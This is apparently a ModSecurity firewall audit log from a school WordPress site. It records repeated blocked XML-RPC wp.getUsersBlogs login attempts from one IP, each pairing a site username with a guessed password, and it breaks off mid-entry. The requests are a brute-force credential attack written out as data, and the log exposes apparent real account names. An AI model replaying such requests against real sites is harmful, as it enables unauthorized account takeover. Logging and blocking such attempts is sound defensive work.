Engine-Mode: "ENABLED"
--0c6e5a3d-Z--
--dcc5976e-A--
[19/Apr/2025:20:52:59 +0700] aAOqu3Na4dA2HllpK_N5VQAAAJE 103.236.140.4 44276 103.236.140.4 8181
--dcc5976e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--dcc5976e-C--
wp.getUsersBlogs
wakakur
123abc
--dcc5976e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dcc5976e-E--
--dcc5976e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070779127488 5647 (- - -)
Stopwatch2: 1745070779127488 5647; combined=4005, p1=475, p2=3361, p3=0, p4=0, p5=100, sr=83, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dcc5976e-Z--
--17933035-A--
[19/Apr/2025:20:54:01 +0700] aAOq-UruoUXZj665VUHzbwAAAMQ 103.236.140.4 44614 103.236.140.4 8181
--17933035-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--17933035-C--
wp.getUsersBlogs
wakakur
123312
--17933035-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--17933035-E--
--17933035-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070841639779 5426 (- - -)
Stopwatch2: 1745070841639779 5426; combined=3844, p1=513, p2=3169, p3=0, p4=0, p5=96, sr=89, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--17933035-Z--
--52161170-A--
[19/Apr/2025:20:55:02 +0700] aAOrNnNa4dA2HllpK_N5fQAAAIM 103.236.140.4 45000 103.236.140.4 8181
--52161170-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--52161170-C--
wp.getUsersBlogs
wakakur
asdsa
--52161170-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--52161170-E--
--52161170-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070902008778 4561 (- - -)
Stopwatch2: 1745070902008778 4561; combined=3126, p1=425, p2=2555, p3=0, p4=0, p5=85, sr=72, sw=61, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--52161170-Z--
--0762644f-A--
[19/Apr/2025:20:56:02 +0700] aAOrcuvDiFC_ir7MDwbiswAAAEY 103.236.140.4 45300 103.236.140.4 8181
--0762644f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0762644f-C--
wp.getUsersBlogs
wakakur
soccer
--0762644f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0762644f-E--
--0762644f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745070962146358 5089 (- - -)
Stopwatch2: 1745070962146358 5089; combined=3990, p1=475, p2=3326, p3=0, p4=0, p5=111, sr=89, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0762644f-Z--
--5624b760-A--
[19/Apr/2025:20:57:06 +0700] aAOrsg6cTFSgLAHl7PrVTgAAAAU 103.236.140.4 45582 103.236.140.4 8181
--5624b760-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--5624b760-C--
wp.getUsersBlogs
wakakur
qqii
--5624b760-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5624b760-E--
--5624b760-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071026323568 5262 (- - -)
Stopwatch2: 1745071026323568 5262; combined=3911, p1=481, p2=3256, p3=0, p4=0, p5=102, sr=91, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5624b760-Z--
--fd0ff612-A--
[19/Apr/2025:20:58:07 +0700] aAOr70ruoUXZj665VUHz0gAAANg 103.236.140.4 45896 103.236.140.4 8181
--fd0ff612-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fd0ff612-C--
wp.getUsersBlogs
wakakur
hunter
--fd0ff612-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fd0ff612-E--
--fd0ff612-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071087483096 5628 (- - -)
Stopwatch2: 1745071087483096 5628; combined=3980, p1=510, p2=3259, p3=0, p4=0, p5=137, sr=88, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fd0ff612-Z--
--6e40ba1c-A--
[19/Apr/2025:20:59:07 +0700] aAOsK-vDiFC_ir7MDwbi7wAAAE4 103.236.140.4 46226 103.236.140.4 8181
--6e40ba1c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6e40ba1c-C--
wp.getUsersBlogs
wakakur
Chegg123
--6e40ba1c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6e40ba1c-E--
--6e40ba1c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071147347581 5125 (- - -)
Stopwatch2: 1745071147347581 5125; combined=3781, p1=461, p2=3151, p3=0, p4=0, p5=99, sr=87, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6e40ba1c-Z--
--33e7db45-A--
[19/Apr/2025:21:00:07 +0700] aAOsZ0ruoUXZj665VUH0IQAAAMI 103.236.140.4 46496 103.236.140.4 8181
--33e7db45-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--33e7db45-C--
wp.getUsersBlogs
wakakur
hockey
--33e7db45-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--33e7db45-E--
--33e7db45-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071207265128 5383 (- - -)
Stopwatch2: 1745071207265128 5383; combined=3849, p1=492, p2=3187, p3=0, p4=0, p5=100, sr=87, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--33e7db45-Z--
--547e3e62-A--
[19/Apr/2025:21:01:09 +0700] aAOspQ6cTFSgLAHl7PrVnwAAAAs 103.236.140.4 46804 103.236.140.4 8181
--547e3e62-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--547e3e62-C--
wp.getUsersBlogs
wakakur
evite
--547e3e62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--547e3e62-E--
--547e3e62-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071269907222 5868 (- - -)
Stopwatch2: 1745071269907222 5868; combined=4081, p1=496, p2=3412, p3=0, p4=0, p5=102, sr=98, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--547e3e62-Z--
--f063855a-A--
[19/Apr/2025:21:02:09 +0700] aAOs4XNa4dA2HllpK_N57gAAAJE 103.236.140.4 47082 103.236.140.4 8181
--f063855a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f063855a-C--
wp.getUsersBlogs
wakahumas
wakahumas
--f063855a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f063855a-E--
--f063855a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071329086680 4730 (- - -)
Stopwatch2: 1745071329086680 4730; combined=3326, p1=406, p2=2772, p3=0, p4=0, p5=88, sr=77, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f063855a-Z--
--48c5446a-A--
[19/Apr/2025:21:03:11 +0700] aAOtH-vDiFC_ir7MDwbjYAAAAFg 103.236.140.4 47366 103.236.140.4 8181
--48c5446a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--48c5446a-C--
wp.getUsersBlogs
wakahumas
admin_lin
--48c5446a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--48c5446a-E--
--48c5446a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071391889194 5476 (- - -)
Stopwatch2: 1745071391889194 5476; combined=3937, p1=445, p2=3201, p3=0, p4=0, p5=188, sr=86, sw=103, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--48c5446a-Z--
--9f205970-A--
[19/Apr/2025:21:04:13 +0700] aAOtXQ6cTFSgLAHl7PrV3AAAABE 103.236.140.4 47644 103.236.140.4 8181
--9f205970-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9f205970-C--
wp.getUsersBlogs
wakahumas
Admin123
--9f205970-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f205970-E--
--9f205970-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071453845767 5334 (- - -)
Stopwatch2: 1745071453845767 5334; combined=3812, p1=462, p2=3172, p3=0, p4=0, p5=106, sr=87, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f205970-Z--
--f687fe75-A--
[19/Apr/2025:21:05:14 +0700] aAOtmuvDiFC_ir7MDwbjpQAAAEo 103.236.140.4 47940 103.236.140.4 8181
--f687fe75-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 233
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f687fe75-C--
wp.getUsersBlogs
wakahumas
wordPress15839Drop
--f687fe75-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f687fe75-E--
--f687fe75-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071514639001 5508 (- - -)
Stopwatch2: 1745071514639001 5508; combined=3965, p1=490, p2=3255, p3=0, p4=0, p5=125, sr=127, sw=95, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f687fe75-Z--
--13a2583a-A--
[19/Apr/2025:21:06:18 +0700] aAOt2g6cTFSgLAHl7PrWAgAAABg 103.236.140.4 48264 103.236.140.4 8181
--13a2583a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--13a2583a-C--
wp.getUsersBlogs
wakahumas
1111111
--13a2583a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--13a2583a-E--
--13a2583a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071578274537 4964 (- - -)
Stopwatch2: 1745071578274537 4964; combined=3864, p1=423, p2=3206, p3=0, p4=0, p5=137, sr=78, sw=98, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13a2583a-Z--
--ec22c600-A--
[19/Apr/2025:21:07:26 +0700] aAOuHuvDiFC_ir7MDwbjuwAAAFA 103.236.140.4 48574 103.236.140.4 8181
--ec22c600-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ec22c600-C--
wp.getUsersBlogs
wakahumas
wakahumas1980
--ec22c600-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ec22c600-E--
--ec22c600-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745071646312381 4967 (- - -)
Stopwatch2: 1745071646312381 4967; combined=3824, p1=437, p2=3218, p3=0, p4=0, p5=100, sr=88, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ec22c600-Z--
--f896c86f-A--
[19/Apr/2025:21:08:26 +0700] aAOuWg6cTFSgLAHl7PrWawAAABc 103.236.140.4 48914 103.236.140.4 8181
--f896c86f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f896c86f-C--
wp.getUsersBlogs
wakahumas
qazwsxedc
--f896c86f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f896c86f-E--
--f896c86f-H--
